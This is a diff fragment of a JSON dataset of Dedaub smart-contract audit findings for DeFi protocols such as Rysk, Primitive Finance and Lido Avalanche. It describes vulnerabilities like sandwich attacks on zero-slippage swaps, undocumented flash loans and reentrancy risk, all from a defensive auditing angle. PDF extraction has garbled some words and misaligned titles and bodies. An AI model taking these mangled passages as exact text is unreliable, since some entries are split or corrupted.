expect(...) line, the test will fail, unless the line is moved after the time increase.
", + "title": "array of public keys provided to MpcManager::createGroup needs to be sorted ", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": " RESOLVED The array of public keys provided to MpcManager::createGroup by the MPC manager needs to be sorted, otherwise the groupId produced by the keccak256 of the array might be different for the same set of public keys. As sorting is tricky to perform on-chain and has not been implemented in this instance, the contract's API or documentation should make it clear that the array provided needs to be already sorted.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] },
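As a cheaper alternative to sorting on-chain, the contract could verify (rather than establish) a canonical order. A minimal sketch, with a hypothetical helper name; the keccak256 comparison imposes an arbitrary-but-fixed total order, so the off-chain tooling must sort by the same order:

// Reverts unless the keys are strictly ascending under hash order,
// which also rules out duplicates; identical key sets then always
// produce the same groupId.
function _requireCanonicalOrder(bytes[] calldata publicKeys) pure {
    for (uint256 i = 1; i < publicKeys.length; i++) {
        require(
            keccak256(publicKeys[i - 1]) < keccak256(publicKeys[i]),
            "keys must be sorted and unique"
        );
    }
}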
{ "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "variables Resolved There are some variables in contracts Distributor.sol and TokenMinter.sol that are assigned during contract construction and could never change thereafter. In Distributor.sol: /// Only settable by the initializer. bool public override callEnabled; address public override nftHolder; uint256 public override maxBeneficiaries In TokenMinter.sol: /// This initialized by the deployer. The token is completely trusted. IImmunefiToken public override token; We suggest these variables be declared immutable for clarity and gas efficiency.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "in AvaLido::fillUnstakeRequests is always true RESOLVED The following check in AvaLido::fillUnstakeRequests is expected to be always true, since the isFilled check right before guarantees that the request is not filled. if (isFilled(unstakeRequests[i])) { // This shouldn't happen, but revert if it does for clearer testing revert(\"Invalid state - filled request in queue\"); } // Dedaub: the following is expected to be always true if (unstakeRequests[i].amountFilled < unstakeRequests[i].amountRequested) { ... }", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "receive hook Dismissed (hook needed by IVestingNFTFunder.vestingNFTCallback) The receive() hook in VestingNFT is intentionally not meant to be used, since ETH is received via mint(). It would be better to revert, to avoid accidentally receiving ETH.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "responsible for setting/updating numeric protocol parameters could define bounds on these values INFO Functions like AvaLido::setStakePeriod and AvaLido::setMinStakeAmount could set lower and/or upper bounds for the accepted values. Such a change might require more initial thought but could protect against accidental mistakes when setting these parameters.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "need to construct a Merkle Tree can be easily avoided Open A large amount of code (MerkleTree.sol / QuickSort.sol) is aimed at constructing (rather than verifying) a MT. However, this is only used by BugReportNotary.assignNullCommentary to construct a tree for a trivial empty commentary. This can be easily avoided by having a hard-coded constant value NULL_COMMENTARY that denotes an empty commentary. The call to discloseCommentary can be omitted in this case (or discloseCommentary can simply check that the value is empty) and NULL_COMMENTARY can be immediately set as canonical.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "might revert with ClaimTooLarge error INFO The function AvaLido::claim checks that the amount requested, amount, is not greater than request.amountFilled - request.amountClaimed. The user experience could be improved if, in such cases, instead of reverting, the claimed amount was set to request.amountFilled - request.amountClaimed, i.e., the maximum amount that can be claimed at the moment. Such a change would require the claim function to return the claimed amount.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "code Partially resolved (dead code still present in LinearVesting.sol) In vesting schedule CliffVesting.sol function _decodeParams() is supposed to return a uint256 value function _decodeParams(bytes calldata params) internal pure returns (uint256 cliffTime) { cliffTime = abi.decode(params, (uint256)); } However, this schedule requires an empty parameter list function checkParams(CommonParameters calldata input) external pure override { require(input.params.length == 0); } All three internal functions _decodeParams(), _decodeState() and decodeContext() are never called for CliffVesting, while the latter two are also never called for LinearVesting schedules. We suggest that all unused functions be removed for clarity and gas savings. Alternatively, the current body of CliffVesting::_decodeParams should be removed.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "storage variables RESOLVED There are a few storage variables that are not used: ValidatorSelector::minimumRequiredStakeTimeRemaining AvaLido::mpcManagerAddress", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "function argument Resolved (argument is not redundant for code extensibility reasons) In KeeperRewards::keeperRewards the first argument is redundant function keeperRewards(address, uint256 value) external pure override returns (uint256) { return value / 1000; } We suggest it be removed for clarity. Also, the constant 1000 in the same code is an arbitrary magic constant, best given a name to document intent.", + "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "UnstakeRequest struct field RESOLVED Field requestedAt of struct UnstakeRequest is not used.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "calling pattern Resolved In BugReportNotary the MerkleProof::verify function is called with different syntax. Once as: merkleProof.verify(reportRoot, leafHash) and once as: MerkleProof.verify(merkleProof, commentaryRoot, leafHash) We recommend making the calling pattern uniform for consistency.",
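For context on the two styles above: they are the same OpenZeppelin library function, with the method-style form enabled by a using-for directive. A minimal sketch (contract name hypothetical):

import {MerkleProof} from "@openzeppelin/contracts/utils/cryptography/MerkleProof.sol";

contract NotaryStyleDemo {
    using MerkleProof for bytes32[];

    function check(bytes32[] memory proof, bytes32 root, bytes32 leaf)
        external pure returns (bool, bool)
    {
        bool methodStyle = proof.verify(root, leaf);               // merkleProof.verify(...)
        bool libraryStyle = MerkleProof.verify(proof, root, leaf); // MerkleProof.verify(...)
        return (methodStyle, libraryStyle); // always equal
    }
}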
+ "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", + "body": "can be made external RESOLVED OracleManager::getWhitelistedOracles can be defined as external instead of public, as it is not called from any code inside the OracleManager contract.", "labels": [ "Dedaub", - "Immunefi", + "Lido Avalanche", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "in vestingNFT Info The README asks for possible ways to remove ReentrancyGuard from vestingNFT. We believe that these guards are critical and advise against trying to remove them (we see no safe way to do so, while keeping the dynamic way of computing the amount of transferred tokens). In particular, a reentrancy to mint from withdraw will directly lead to a severe loss of funds. Currently this is indirectly protected by the nonReentrant flag in _deposit and _beforeTokenTransferInner (we recommend clearly documenting the importance of these flags, to prevent them from getting accidentally removed).", - "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "funds in a single contract (VestingNFT) Info The architecture stores all ERC-20 tokens (assets) in a single contract (VestingNFT), and accounts for how they are shared among many different NFTs/bounties. This is a decision that puts a significant burden on asset accounting. It should be simpler/safer to have a treasury contract that indexes assets by NFT and keeps assets entirely separate. However, the current design seems to exist in order to support ERC-20 tokens that change in number with time. This certainly necessitates a shares model instead of a separate accounts model. It may be good to document exactly the behavior of tokens that the designer of the contract expects, with specific token examples. There are certainly token models that will not be supported by the current design, and others that are. A more radical approach could also be to use a clone of VestingNFT for each bounty (similarly to how clones of vestingNFTReceiver are used), so that funds for each bounty are kept in a separate contract. Apart from facilitating the accounting (no need for a \"shares\" model), this design would likely mitigate the losses from a critical bug (the adversary could drain a single bounty but not all of them).", - "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "code Resolved The function QuickSort::sort admits some simplifications/dead-code elimination. Some of these are only possible under the invariant left < right (which is true in the current uses of the function), others regardless. We highlight them in the four code comments below.
function sort( bytes32[] memory arr, uint256 left, uint256 right // Dedaub: invariant: left < right ) internal pure { uint256 i = left; uint256 j = right; if (i == j) return; // Dedaub: dead code, under invariant bytes32 pivot = arr[left + (right - left) / 2]; while (i <= j) { // Dedaub: definitely true the first time, under invariant, // loop could be a do..while while (arr[i] < pivot) i++; while (pivot < arr[j]) j--; if (i <= j) { // Dedaub: always the case, no need to check (arr[i], arr[j]) = (arr[j], arr[i]); i++; j--; } } if (left < j) sort(arr, left, j); if (i < right) sort(arr, i, right); }", - "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "cannot recover from renouncing Dismissed (intended behavior) In the ImplOwnable contract (currently unused) if the owner calls renounceOwnership, no new owner can be installed. It is unclear whether this is intentional and whether the contract will be used in the future.", - "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "for contract size Info For the bytecode size issues of VestingNFT, our suggestion would be to create a VestingNFT library contract (containing all functions that do not heavily involve storage slots, such as pure functions, some views that only affect 1-2 storage slots) and have calls in VestingNFT delegate to the library versions. Shorter-term solutions might exist (e.g., removing one of the super-contracts, such as DelegateGuard, in some way) but they will not save a large contract from bumping against size limits for long.", - "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Immunefi/Immunefi audit Jul 21.pdf", - "body": "pragma Open Use of a floating pragma: The floating pragma pragma solidity ^0.8.6; is used, allowing contracts to be compiled with any version of the Solidity compiler that is greater or equal to v0.8.6 and lower than v0.9.0. Although the differences between these versions should be small, for deployment, floating pragmas should ideally be avoided and the pragma be fixed. A15 Compiler known issues Info Solidity compiler v0.8.6, at the time of writing, has no known bugs.", - "labels": [ "Dedaub", - "Immunefi", - "Severity: Informational" - ] - },
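As a concrete illustration of the pragma recommendation above, pinning to one compiler version is a one-line change (version shown is the one named in the finding):

// pragma solidity ^0.8.6;  // floating: accepts any 0.8.x >= 0.8.6
pragma solidity 0.8.6;      // fixed: builds reproduce the audited compiler exactly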
{ "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "margins mapping indexing in SwapManager::swap RESOLVED Method SwapManager::swap performs an internal balance deposit on the margins mapping when params.toMargin evaluates to true. The margins mapping is a double mapping, going from a PrimitiveEngine address to a user address to the user's margin. Instead of indexing the first mapping with params.engine and the second with msg.sender, indexing is implemented the other way around, leading to invalid PrimitiveHouse state. H2 Incorrect margin deposit value in SwapManager::swap RESOLVED There is a second issue with the margins mapping update operation in SwapManager::swap (the one discussed in issue H1). The deposited amount of tokens is deltaIn instead of deltaOut, which creates inconsistency between the states of PrimitiveEngine and PrimitiveHouse and in general is not consistent with the protocol's logic. The following snippet addresses both this issue and issue H1: if (params.toMargin) { margins[params.engine][msg.sender].deposit( params.riskyForStable ? params.deltaOut : 0, params.riskyForStable ? 0 : params.deltaOut ); } [After our report, the Primitive Finance team identified that the deltaOut amount was deposited in the wrong margin, i.e., deltaOut risky in stable margin and the other way around. Consequently, the above example has the ternary operator result expressions inverted in its final form.] MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: High" ] }, { "title": "Flash-Loan Functionality ", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": " DISMISSED PrimitiveEngine::swap can actually be used to get flash loans from the Primitive reserves. However, this functionality is not documented and may have been implemented by mistake. One can get flash loans by implementing a contract with the swapCallback function. When this gets called by the engine, the output ERC20", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Low" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "tokens have already been transferred to the engine contract, and all that is required for the rest of the transaction to succeed is to transfer the input tokens back.", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Critical" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", "body": "Multicall Error Handling OPEN The Multicall error handling mechanism assumes a fixed ABI for error messages. This would have worked in Solidity 0.7.x for the default Error(string) ABI. However, Solidity has custom errors in 0.8.x that can encode valid errors with a shorter returndata. The correct way to propagate errors is to re-raise them (e.g., by copying the returndata to the revert input data).", "labels": [ "Dedaub", "Primitive Finance V2", "Severity: Low" ] },
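A minimal sketch of the re-raising pattern recommended in the Multicall finding above (a generic multicall, not the Primitive code): bubbling up the raw returndata preserves custom errors, Error(string), Panic(uint256), and even empty reverts verbatim.

function multicall(bytes[] calldata calls) external returns (bytes[] memory results) {
    results = new bytes[](calls.length);
    for (uint256 i = 0; i < calls.length; i++) {
        (bool ok, bytes memory ret) = address(this).delegatecall(calls[i]);
        if (!ok) {
            // Re-raise the inner call's revert data unchanged instead of
            // assuming any particular error ABI.
            assembly {
                revert(add(ret, 0x20), mload(ret))
            }
        }
        results[i] = ret;
    }
}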
", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Low" - ] - }, - { - "title": "always returns true ", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": " RESOLVED Transfers::safeTransfer return value is always true (as noted in a comment), thus can be removed as an optimization.", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "zero liquidity check in PrimitiveEngine::remove RESOLVED PrimitiveEngine::remove does not revert in case of 0 provided liquidity, which leads to unnecessary computation and gas fee for the user. PrimitiveHouse::remove implements an early check for such a scenario.", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Informational" - ] - }, - { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Primitive Finance/Primitive Finance V2.pdf", - "body": "Bookkeeping and Transfers DISMISSED The architecture as it currently stands, and the relationship between PrimitiveHouse and PrimitiveEngine causes multiple token transfers to intermediate contracts, and multiple layers of bookkeeping, with some redundancy. This causes the application to consume more gas. DISMISSED: The specic architecture is highly desired by the protocol developers. Nevertheless, a few transfer operations have been optimized. A4 No engine-risky-stable sanity check in PrimitiveHouse RESOLVED create and allocate methods In PrimitiveHouse::create and PrimitiveHouse::allocate the user has to provide the PrimitiveEngine address and the addresses of the risky and stable tokens, while there is no early check that ensures the pair of risky and stable tokens provided corresponds to the engine address. This check is implemented in the respective callback functions, maintaining the security of the protocol. However, the 0 execution of the contract will only revert at such a late point (i.e., in the callback) even if a user provides a wrong engine, risky and stable tokens triplet by mistake, leading to unnecessary gas consumption, which could have been avoided with an early check. 0", - "labels": [ - "Dedaub", - "Primitive Finance V2", - "Severity: Informational" - ] - }, - { - "title": "is susceptible to front-running RESOLVED The OptionExchange contracts redeem() function calls _swapExactInputSingle() with minimum output set to 0, making it susceptible to a front-running/sandwich aack when collateral is being liquidated. It is recommended that a minimum representing an acceptable loss on the swap is used instead. // OptionExchange::redeem function redeem(address[] memory _series) external { _onlyManager(); uint256 adLength = _series.length; for (uint256 i; i < adLength; i++) { // ... Dedaub: Code omied for brevity. if (otokenCollateralAsset == collateralAsset) { // ... Dedaub: Code omied for brevity. } else { // Dedaub: Minimum output set to 0. Susceptible to sandwich aacks. uint256 redeemableCollateral = _swapExactInputSingle(redeemAmount, 0, otokenCollateralAsset); SafeTransferLib.safeTransfer( ERC20(collateralAsset),address(liquidityPool),redeemableCollateral ); emit RedemptionSent( redeemableCollateral, collateralAsset, address(liquidityPool) ); } } } H2 VolatilityFeed updates are susceptible to front-running DISMISSED The VolatilityFeed contract uses the SABR model to compute the implied volatility of an option series. 
This model uses a number of parameters which are regularly updated by a keeper through the updateSabrParameters() function. It is possible for an attacker to front-run this update, transact with the LiquidityPool at the old price and then transact back with the LiquidityPool at the new price (computed in advance) if the difference is profitable. The Rysk team has indicated that trading will be paused for a few blocks to allow for parameter updates to happen and to effectively prevent this situation. MEDIUM SEVERITY: ID Description M1 No staleness check on the volatility feed ", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": " ACKNOWLEDGED The function quoteOptionPrice of the BeyondPricer contract retrieves the implied volatility from the function VolatilityFeed::getImpliedVolatility(). However, the returned value is not accompanied by a timestamp that can be used by the quoteOptionPrice() function to determine whether the value is stale or not. Since the implied volatility returned is affected by a keeper, which is responsible for updating the parameters of the underlying SABR model, it is recommended that staleness checks are implemented in order to avoid providing wrong implied volatility values. LOW SEVERITY: ", "labels": [ "Dedaub", "Rysk", "Severity: High" ] }, { "title": "use of price feeds for the price of the underlying ", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": " DISMISSED The BeyondPricer contract gets the price of the underlying token via the function _getUnderlyingPrice(), which consults a Chainlink price feed for the price. // BeyondPricer::_getUnderlyingPrice function _getUnderlyingPrice(address underlying, address _strikeAsset) internal view returns (uint256) { return PriceFeed(protocol.priceFeed()). getNormalizedRate(underlying, _strikeAsset); } However, when trying to obtain the same price in the function _getCollateralRequirements(), the addressBook is used to get the price feed from an Oracle implementing the IOracle interface. // BeyondPricer::_getCollateralRequirements function _getCollateralRequirements( Types.OptionSeries memory _optionSeries, uint256 _amount ) internal view returns (uint256) { IMarginCalculator marginCalc = IMarginCalculator(addressBook.getMarginCalculator()); return marginCalc.getNakedMarginRequired( _optionSeries.underlying, _optionSeries.strikeAsset, _optionSeries.collateral, _amount / SCALE_FROM, _optionSeries.strike / SCALE_FROM, // assumes in e18 IOracle(addressBook.getOracle()).getPrice(_optionSeries.underlying), _optionSeries.expiration, 18, // always have the value return in e18 _optionSeries.isPut ); } The same addressBook technique is used in the getCollateral() function of the OptionRegistry contract and in the checkVaultHealth() function of the OptionRegistry contract. It is recommended that this is refactored to use the Chainlink feed, in order to avoid a situation where different prices for the underlying are obtained by different parts of the code. The Rysk team intends to keep the price close to what the Opyn system would quote, thus using the Opyn Chainlink oracle is actually correct, as it represents the actual situation that would occur for these given quotes. L2 Multiple uses of div before mul in OptionExchange's _handleDHVBuyback() function RESOLVED In the OptionExchange contract's _handleDHVBuyback() function, a division is used before a multiplication operation at lines 925 and 932. It is recommended to use multiplication prior to division operations to avoid a possible loss of precision in the calculation. Alternatively, the mulDiv function of the PRBMath library could be used.
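To see why the ordering in L2 matters, consider a tiny illustration (the fee numbers are hypothetical, not taken from the audited code): with integer arithmetic, the early division truncates.

// Illustration only: 250 bps fee on an amount of 999.
function feeDivFirst(uint256 amount) pure returns (uint256) {
    return amount / 10_000 * 250; // feeDivFirst(999) == 0: division truncates first
}

function feeMulFirst(uint256 amount) pure returns (uint256) {
    return amount * 250 / 10_000; // feeMulFirst(999) == 24: precision preserved
}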
CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ", "labels": [ "Dedaub", "Rysk", "Severity: Low" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "reentrancy in OptionRegistry::redeem() ACKNOWLEDGED The OptionRegistry's redeem() function is not access controlled and calls the OpynInteractions library contract's redeem() function, which interacts with the GammaController and the option and collateral tokens. Dedaub's static analysis tools warned about a potential reentrancy risk. Our manual inspection identified no such immediate risk, but as the tokens supported are not strictly defined and a future version of the code could potentially make such an attack possible, it is advisable to add a reentrancy guard around OptionRegistry's redeem() function.", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "optimisation in OptionRegistry's open() function ACKNOWLEDGED The OptionRegistry::open() function performs the assignment vaultIds[_series] = vaultId_ on line 271. But this can be moved into the if block starting at line 255, since vaultId_ only changes value if this if block is executed. // OptionRegistry::open function open( address _series, uint256 amount, uint256 collateralAmount ) external returns (bool, uint256) { _isLiquidityPool(); // make sure the options are ok to open Types.OptionSeries memory series = seriesInfo[_series]; // assumes strike in e8 if (series.expiration <= block.timestamp) { revert AlreadyExpired(); } // ... Dedaub: Code omitted for brevity. if (vaultId_ == 0) { vaultId_ = (controller.getAccountVaultCounter(address(this))) + 1; vaultCount++; } // ... Dedaub: Code omitted for brevity. // Dedaub: Below assignment can be moved inside the above block. vaultIds[_series] = vaultId_; // returns in collateral decimals return (true, collateralAmount); }", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "comment in OptionExchange's _swapExactInputSingle() function RESOLVED The OptionExchange's _swapExactInputSingle() function definition is annotated with several misleading comments. For instance, it mentions that _amountIn has to be in WETH, when it can support any collateral token. It also mentions that _assetIn is the stablecoin that is bought, when it is in fact the collateral that is swapped. The description of the function, which reads \"function to sell exact amount of WETH to decrease delta\", is incorrect.
// OptionExchange::_swapExactInputSingle /** @notice function to sell exact amount of wETH to decrease delta * @param _amountIn the exact amount of wETH to sell * @param _amountOutMinimum the min amount of stablecoin willing to receive. Slippage limit. * @param _assetIn the stablecoin to buy * @return the amount of usdc received */ function _swapExactInputSingle( uint256 _amountIn, uint256 _amountOutMinimum, address _assetIn) internal returns (uint256) { // ... Dedaub: Code omitted for brevity. }", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "comment in BeyondPricer's _getSlippageMultiplier() function RESOLVED The division of the _amount by 2, mentioned in the code comment, does not appear in the code. It appears that this comment corresponds to a previous version of the codebase and it should be removed. //BeyondPricer::_getSlippageMultiplier function _getSlippageMultiplier( uint256 _amount, int256 _optionDelta, int256 _netDhvExposure, bool _isSell ) internal view returns (uint256 slippageMultiplier) { // divide _amount by 2 to obtain the average exposure throughout the tx. // Dedaub: The above comment is not relevant any more. // ... Dedaub: Code omitted for brevity. }", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "library's lognormalVol() can in principle return negative values ACKNOWLEDGED The formula of the SABR model that is responsible for computing the implied volatility (https://web.math.ku.dk/~rolf/SABR.pdf formula (2.17a)) is an approximate one. It is not clear to us if this value will always be non-negative, as it should be. For example, for absolute values of ρ close to 1 and large values of ν, the last term of this formula, and probably the whole value of the implied volatility, will be negative. The execution of VolatilityFeed::getImpliedVolatility will revert if the value returned by lognormalVol() is negative, to protect the protocol from using this absurd value. Nevertheless, if this keeps happening for a while, the protocol will be unable to price the options and therefore will be unable to work. This issue could be avoided either by a careful choice of the SABR parameters by the protocol's keepers or by using an alternative volatility feed in case this happens.", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "check in BeyondPricer's quoteOptionPrice() RESOLVED In BeyondPricer::quoteOptionPrice() a check that _optionSeries.expiration >= block.timestamp is missing. If the function is called to price an option series with a past expiration date, it will return an absurd result. We suggest adding a check that would revert the execution with an appropriate message in case the condition is not satisfied.", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] },
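A minimal sketch of the guard suggested in the expiration finding above (the custom error and helper name are hypothetical, not taken from the Rysk codebase):

error SeriesExpired(uint256 expiration);

// Revert early when asked to price an already-expired series, assuming
// expiration is a unix timestamp.
function _requireNotExpired(uint256 expiration) internal view {
    if (expiration < block.timestamp) revert SeriesExpired(expiration);
}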
{ "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "is defined as public even though its name suggests otherwise RESOLVED Function OptionExchange::_checkHash, which returns whether an option series is approved or not, is defined as public. However, the starting underscore in _checkHash implies that this functionality should not be exposed externally (via the public modifier), creating an inconsistency, even though it is probably useful/necessary to the users of the protocol.", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "returns an incorrect value RESOLVED Whenever a user wants to buy an amount of options, first it is checked if the long exposure of the protocol to this option series is positive. If this is the case, then the protocol first sells the options it holds, to decrease its long exposure, and if they are not enough, then the LiquidityPool writes extra options to reach the amount requested by the user. The problem is that the _buyOption function, in the case the LiquidityPool is called to write these extra options, returns only this extra amount, and not the total amount sold to the user.", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, { "title": "", "html_url": "https://github.com/dedaub/audits/tree/main/Rysk/Rysk Audit - Feb '23.pdf", "body": "of compiler versions RESOLVED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. It is recommended that the compiler version is fixed to a specific version and that this is kept consistent amongst source files. A10 Compiler bugs ACKNOWLEDGED The code of the BeyondPricer, OptionExchange and OptionCatalogue contracts is compiled with the floating pragma >=0.8.0, and the OptionRegistry contract is compiled with the floating pragma >=0.8.9. Versions 0.8.0 and 0.8.9 in particular have some known bugs, which we do not believe affect the correctness of the contracts.", "labels": [ "Dedaub", "Rysk", "Severity: Informational" ] }, @@ -1370,422 +1170,1582 @@ ] }, { "title": "can be simplified from Uint32 to Bool ", "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", "body": " RESOLVED In aZil, the field tmp_buffer_exists_at_ssn is declared as Uint32: field tmp_buffer_exists_at_ssn: Uint32 = uint32_zero However, all writes to this field are either 0 or 1, and all reads from it are followed up by an equality check with 0 and a match statement - the field is a boolean à la C.
01", "labels": [ "Dedaub", - "Rysk", + "Lido Avalanche", "Severity: Informational" ] }, @@ -1370,422 +1170,1582 @@ ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Vesper Finance/Vesper Pools+Strategies September Audit.pdf", - "body": "(or consulting an oracle for pricing) can be front-run Status Open 4 There are many instances of Uniswap/Sushiswap swaps and oracle queries (mainly wrapped in calls to to the internal swapManager.safeGetAmountsOut, swapTokensForExactTokens, bestOutputFixedInput) that can be front-run or return biased results through tilted exchange pools. Fixing this requires careful thought, but the codebase has already started integrating a simple time-weighted average price oracle. function Strategy::_safeSwap, but also as direct calls calls and to We have warned about such swaps in past audits and the saving grace has been that the swapped amounts are small: typically interest/reward payments only. Thus, tilting the exchange pool is not protable for an attacker. In CompoundXYStrategy (which contains many of these calls), swaps are performed not just from the COMP rewards token but also from the collateral token. Similarly, in the Earn strategies, the _convertCollateralToDrip does an unrestricted collateral swap, on the default path (no swapSlippage dened). Swapping collateral (up to all available) should be ne if the only collateral token amounts held in the strategy at the time of the swap are from exchanging COMP or other rewards. Still, this seems like a dangerous practice. Standard background: The problem is that the swap can be sandwiched by an attacker collaborating with a miner. This is a very common pattern in recent months, with MEV (Maximum Extractable Value) attacks for total sums in the hundreds of millions. The current code complexity offers some small protection: typically attackers colluding with miners currently only attack the simplest, lowest-risk (to them) transactions. However, with small code analysis of the Vesper code, an attacker can recognize quickly the potential for sandwiching and issue an attack, rst tilting the swap pool and then restoring it, to retrieve most of the funds swapped by the Vesper code. In the current state of the code, the attacker will likely need to tilt two pools: both Uniswap and Sushiswap. However, this also offers little protection, since they both use similar on-chain price computations and near-identical APIs. In the short-term, deployed code should be closely monitored to ensure the swapped amounts are very small (under 0.3%) relative to the size of the pools involved. Also, if an attack is detected, the contract should be paused to avoid repeat attacks. However, the code should evolve to have an estimate of asset pricing at the earliest possible time! This can be achieved by using the TWAP functionality that is already being added, with some tolerance based on this expected price.", + "title": "can be simplied from Uint32 to Bool ", + "html_url": "https://github.com/dedaub/audits/tree/main/Avely Finance/Avely Audit Report.pdf", + "body": " RESOLVED In aZil, the eld tmp_buffer_exists_at_ssn is declared as Uint32: field tmp_buffer_exists_at_ssn: Uint32 = uint32_zero However, all writes to this eld are either 0 or 1, and all reads from it are followed up by an equality check with 0 and a match statement - the eld is a boolean la C. 
